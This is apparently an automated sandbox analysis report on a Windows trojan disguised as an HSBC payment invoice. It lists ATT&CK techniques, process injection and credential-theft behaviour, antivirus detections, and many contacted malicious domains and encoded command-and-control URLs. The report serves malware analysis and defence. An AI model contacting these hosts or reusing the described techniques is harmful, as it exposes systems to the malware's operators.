            Source: Yara matchFile source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EF6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00EF6596
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EF6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00EF6A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		31
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            Software Packing            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		1
            DLL Side-Loading            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Valid Accounts            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Virtualization/Sandbox Evasion            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Rundll32            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466744 Sample: HSBCscancopy-invoice778483-... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 28 www.hawalaz.xyz 2->28 30 www.yetung.com 2->30 32 21 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 6 other signatures 2->50 10 HSBCscancopy-invoice778483-payment87476MT103.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 UTbMqukHxZGmxEZNWddXnDURe.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rundll32.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 2 other signatures 19->58 22 UTbMqukHxZGmxEZNWddXnDURe.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.hawalaz.xyz 162.0.213.72, 49720, 49721, 49722 ACPCA Canada 22->34 36 www.lavillitadepapa.com 74.208.46.171, 49756, 49757, 49758 ONEANDONE-ASBrauerstrasse48DE United States 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            HSBCscancopy-invoice778483-payment87476MT103.exe37%ReversingLabsWin32.Trojan.Strab
            HSBCscancopy-invoice778483-payment87476MT103.exe38%VirustotalBrowse
            HSBCscancopy-invoice778483-payment87476MT103.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.zt555.shop0%VirustotalBrowse
            www.personalcaresale.shop0%VirustotalBrowse
            www.oliviacorepilates.com0%VirustotalBrowse
            www.zl1l5r.website1%VirustotalBrowse
            www.hawalaz.xyz1%VirustotalBrowse
            www.lavillitadepapa.com1%VirustotalBrowse
            www.dribbean.website0%VirustotalBrowse
            www.lecoinsa.net0%VirustotalBrowse
            www.yetung.com3%VirustotalBrowse
            www.778981.com3%VirustotalBrowse
            marismotivates.com0%VirustotalBrowse
            www.warcorpshs.com0%VirustotalBrowse
            www.marismotivates.com1%VirustotalBrowse
            www.gzlhysuess.com0%VirustotalBrowse
            www.xn--vct91ch7lruy.com0%VirustotalBrowse
            www.pista789.win2%VirustotalBrowse
            www.66hc7.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://wap.warsr.cn/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wt0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_72.html0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/favicon.ico0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.zl1l5r.website/template/zblogres/khuboni/static/js/jquery-2.2.4.min.js0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_08.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/xiuxian/0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_39.html0%Avira URL Cloudsafe
            http://www.qq42cw.website/news/MzSm.html0%Avira URL Cloudsafe
            http://goge8opp.com:3010%Avira URL Cloudsafe
            https://v-cn.vaptcha.com/v3.js0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_70.html0%Avira URL Cloudsafe
            http://www.oliviacorepilates.com/73ru/?ylT8el=Zh+IM8qjm4uq8k9wxtMLd6Xf0ZIUNYGdjg1+kqPemyuHWYjZ2nTRrdxzh5HhdoGeXRxYWxa1gnZNrA+Bjjg73w83aTj9n1osxTjbZgXdDDbnL1DvvKoogN8=&Qb94=7vWTifjxU0%Avira URL Cloudsafe
            http://www.zl1l5r.website/redian/0%Avira URL Cloudsafe
            http://www.66hc7.com/qvp8/0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_11.html0%Avira URL Cloudsafe
            https://v-cn.vaptcha.com/v3.js0%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://goge8opp.com:3010%VirustotalBrowse
            http://www.zl1l5r.website/post/1_54.html0%Avira URL Cloudsafe
            http://www.yetung.com/fuvg/0%Avira URL Cloudsafe
            http://www.zl1wsm.website0%Avira URL Cloudsafe
            http://www.66hc7.com/qvp8/0%VirustotalBrowse
            http://www.zl1l5r.website/post/1_68.html0%Avira URL Cloudsafe
            http://www.oliviacorepilates.com/73ru/0%Avira URL Cloudsafe
            http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQE0%Avira URL Cloudsafe
            http://www.zl1l5r.website/zixun/0%Avira URL Cloudsafe
            http://www.zl100g.website/news/Snfj.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_52.html0%Avira URL Cloudsafe
            https://cdn.livechatinc.com/tracking.js0%Avira URL Cloudsafe
            https://img.leisu.com/uploads/allimg/190516/1-1Z51621O53-53.jpg0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_35.html0%Avira URL Cloudsafe
            http://www.sophiahotelqingdao.com/news/bDhM.html0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.hawalaz.xyz/f0fa/?Qb94=7vWTifjxU&ylT8el=xEHl79bWtW6ubhQfSoH97y0Qn20SG8yk5613CYRnCuX+EaUdTnw5hRzhIFWMyf9Ue4jcKh73mqYqHXL3KYCSgMywK+MaAYZcUVEgz/x9qwHKwJpT4dGZYKc=0%Avira URL Cloudsafe
            http://www.yetung.com/fuvg/?Qb94=7vWTifjxU&ylT8el=wjL2fUVi/vacV80Y2aNNPqSsAyaVO2G0XUXvAjUGJRlNA9hvm73ZM/ZGCRwMrdgYWSVcgksWY7rEUvpJmp/24/R5TooPs7UexVe6llrM7njVoxJ4Iww3fUU=0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_8.html0%Avira URL Cloudsafe
            http://wap.tdvec.cn/0%Avira URL Cloudsafe
            http://www.zl1l5r.website/yule/0%Avira URL Cloudsafe
            http://www.marismotivates.com/f0bn/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js0%Avira URL Cloudsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/static/css/animate.css0%Avira URL Cloudsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/static/css/style.css0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_90.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_61.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/static/js/html2canvas.min.js0%Avira URL Cloudsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/static/js/jquery.lazy.js0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_07.html0%Avira URL Cloudsafe
            http://www.a9d.net0%Avira URL Cloudsafe
            http://www.66hc7.com/qvp8/?ylT8el=mplvrs1ArIkdV+pbxofmUrh9prbBWCkT+xqmpCLdJLMyBhuMsd9mhte1ppk8n/DSN9iY8LBVRzSodz5vy5F/ty/lBcXgfSQQVjq9BvSoxXo59QHAZm1IeeI=&Qb94=7vWTifjxU0%Avira URL Cloudsafe
            http://www.marismotivates.com/f0bn/?Qb94=7vWTifjxU&ylT8el=8gTqnLvKWah2bzreY4Z7YC6tcQCJVJlJXhg7Umglyi2zgynbPTp6zLopmb5gqsRo3dR1TaY9uWyFfEDO77D4zzlWEvz5BTf+ZLZnZGAxAhIiwZDsfI/I78A=0%Avira URL Cloudsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/static/js/html5shiv.js0%Avira URL Cloudsafe
            http://app.zl1ht1.website/0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_80.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/450c/0%Avira URL Cloudsafe
            http://www.zl1l5r.website/baike/0%Avira URL Cloudsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/static/picture/202209041662300408955816.png0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_77.html0%Avira URL Cloudsafe
            http://www.778981.com/i74x/?ylT8el=rGww97JzOeWTLmyois9H82aBQ3facQDCwEviMnQ79nb2eFak94tqYxOEecYPqZ845ayBGu2PRCoY8TnogyJmQQHYtnGZFnvjZEpOTC2C7mypHaGwxY9ZF1g=&Qb94=7vWTifjxU100%Avira URL Cloudmalware
            http://www.zl1l5r.website/post/1_78.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/static/css/swiper.min.css0%Avira URL Cloudsafe
            http://www.lavillitadepapa.com/6qht/?ylT8el=uv+LHhobnH+SyOAbX9GzDMPimlyd0mIqpPmIf9VchnwZRWYaEtRt5W9pqYxhRwpbfDifuk3w05PJo1ySs8BePpe0vNNcbDdG6zcEL5spVXXRDXig7aJejtk=&Qb94=7vWTifjxU0%Avira URL Cloudsafe
            https://www.lavillitadepapa.com/6qht/?ylT8el=uv0%Avira URL Cloudsafe
            http://www.lavillitadepapa.com0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_14.html0%Avira URL Cloudsafe
            http://www.zl100g.website0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_46.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_51.html0%Avira URL Cloudsafe
            http://www.778981.com/i74x/100%Avira URL Cloudmalware
            http://www.zl1l5r.website/post/1_65.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/zhishi/0%Avira URL Cloudsafe
            http://www.zl1gya.website/news/X59A.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_66.html0%Avira URL Cloudsafe
            http://www.hawalaz.xyz/f0fa/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.yuanjihua.vip/0%Avira URL Cloudsafe
            http://www.lavillitadepapa.com/6qht/0%Avira URL Cloudsafe
            http://m.rmrwvg.cn/0%Avira URL Cloudsafe
            http://www.zl1l5r.website/shishang/0%Avira URL Cloudsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/static/js/common.js0%Avira URL Cloudsafe
            http://news.wawlh.cn/0%Avira URL Cloudsafe
            http://www.personalcaresale.shop/6xrq/0%Avira URL Cloudsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/static/js/wow.min.js0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_34.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_56.html0%Avira URL Cloudsafe
            http://www.zloyow.website/0%Avira URL Cloudsafe
            http://www.lecoinsa.net/i4bw/0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_37.html0%Avira URL Cloudsafe
            http://www.zl1l5r.website/template/zblogres/khuboni/static/js/swiper.min.js0%Avira URL Cloudsafe
            http://www.zl1l5r.website/post/1_50.html0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            kloeti.pc205kopl.com
            		162.209.189.210
            		truefalse
              		unknown
              yetung.com.lho0.faipod.com
              		121.37.199.72
              		truefalse
                		unknown
                www.zt555.shop
                		118.99.50.8
                		truefalseunknown
                www.personalcaresale.shop
                		104.21.21.230
                		truefalseunknown
                www.oliviacorepilates.com
                		3.33.244.179
                		truefalseunknown
                www.zl1l5r.website
                		198.16.50.172
                		truefalseunknown
                www.hawalaz.xyz
                		162.0.213.72
                		truetrueunknown
                www.lavillitadepapa.com
                		74.208.46.171
                		truefalseunknown
                www.lecoinsa.net
                		217.116.0.191
                		truefalseunknown
                7a4ca695fd164z.greycdn.net
                		165.154.0.120
                		truefalse
                  		unknown
                  marismotivates.com
                  		3.33.130.190
                  		truefalseunknown
                  www.dribbean.website
                  		unknown
                  		unknowntrueunknown
                  www.778981.com
                  		unknown
                  		unknowntrueunknown
                  www.gzlhysuess.com
                  		unknown
                  		unknowntrueunknown
                  www.warcorpshs.com
                  		unknown
                  		unknowntrueunknown
                  www.yetung.com
                  		unknown
                  		unknowntrueunknown
                  www.marismotivates.com
                  		unknown
                  		unknowntrueunknown
                  www.xn--vct91ch7lruy.com
                  		unknown
                  		unknowntrueunknown
                  www.66hc7.com
                  		unknown
                  		unknowntrueunknown
                  www.pista789.win
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.oliviacorepilates.com/73ru/?ylT8el=Zh+IM8qjm4uq8k9wxtMLd6Xf0ZIUNYGdjg1+kqPemyuHWYjZ2nTRrdxzh5HhdoGeXRxYWxa1gnZNrA+Bjjg73w83aTj9n1osxTjbZgXdDDbnL1DvvKoogN8=&Qb94=7vWTifjxUfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.66hc7.com/qvp8/false
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.yetung.com/fuvg/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.oliviacorepilates.com/73ru/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.hawalaz.xyz/f0fa/?Qb94=7vWTifjxU&ylT8el=xEHl79bWtW6ubhQfSoH97y0Qn20SG8yk5613CYRnCuX+EaUdTnw5hRzhIFWMyf9Ue4jcKh73mqYqHXL3KYCSgMywK+MaAYZcUVEgz/x9qwHKwJpT4dGZYKc=false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.yetung.com/fuvg/?Qb94=7vWTifjxU&ylT8el=wjL2fUVi/vacV80Y2aNNPqSsAyaVO2G0XUXvAjUGJRlNA9hvm73ZM/ZGCRwMrdgYWSVcgksWY7rEUvpJmp/24/R5TooPs7UexVe6llrM7njVoxJ4Iww3fUU=false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.marismotivates.com/f0bn/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.66hc7.com/qvp8/?ylT8el=mplvrs1ArIkdV+pbxofmUrh9prbBWCkT+xqmpCLdJLMyBhuMsd9mhte1ppk8n/DSN9iY8LBVRzSodz5vy5F/ty/lBcXgfSQQVjq9BvSoxXo59QHAZm1IeeI=&Qb94=7vWTifjxUfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.marismotivates.com/f0bn/?Qb94=7vWTifjxU&ylT8el=8gTqnLvKWah2bzreY4Z7YC6tcQCJVJlJXhg7Umglyi2zgynbPTp6zLopmb5gqsRo3dR1TaY9uWyFfEDO77D4zzlWEvz5BTf+ZLZnZGAxAhIiwZDsfI/I78A=false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/450c/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.778981.com/i74x/?ylT8el=rGww97JzOeWTLmyois9H82aBQ3facQDCwEviMnQ79nb2eFak94tqYxOEecYPqZ845ayBGu2PRCoY8TnogyJmQQHYtnGZFnvjZEpOTC2C7mypHaGwxY9ZF1g=&Qb94=7vWTifjxUfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.lavillitadepapa.com/6qht/?ylT8el=uv+LHhobnH+SyOAbX9GzDMPimlyd0mIqpPmIf9VchnwZRWYaEtRt5W9pqYxhRwpbfDifuk3w05PJo1ySs8BePpe0vNNcbDdG6zcEL5spVXXRDXig7aJejtk=&Qb94=7vWTifjxUfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.778981.com/i74x/false
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.hawalaz.xyz/f0fa/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.lavillitadepapa.com/6qht/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.personalcaresale.shop/6xrq/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.lecoinsa.net/i4bw/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.personalcaresale.shop/6xrq/?Qb94=7vWTifjxU&ylT8el=0ZLpfg2H9HntusEXGWgUouKi/jDeWipEcG796wEdKEsBvDcnIDw0UWV/lYuuqMa5oYme4k6lXZ3r5FhP4GItrsCavENJ4moU1CqQcclLTaPymUsAULXTIFQ=false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/450c/?Qb94=7vWTifjxU&ylT8el=/ao65P+sOfMmbfuniX6EnBn+VadGjlZ4IHs7OXNxrL4MnIz0MXJ+3t4uCaWRdYsePUgUyRGsjSJtYkpLrLyO4a/zR2SZCsSjaR7P/IMYlkzk2RPJsuViTJY=false
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabrundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://wap.warsr.cn/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtrundll32.exe, 0000000B.00000002.3728535943.0000000006258000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004908000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_72.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/favicon.icorundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/js/jquery-2.2.4.min.jsrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_08.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_39.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/xiuxian/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.qq42cw.website/news/MzSm.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://goge8opp.com:301rundll32.exe, 0000000B.00000002.3728535943.0000000005A7E000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000412E000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://v-cn.vaptcha.com/v3.jsrundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_70.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/redian/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_11.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssrundll32.exe, 0000000B.00000002.3728535943.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000003C78000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_54.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1wsm.websiterundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
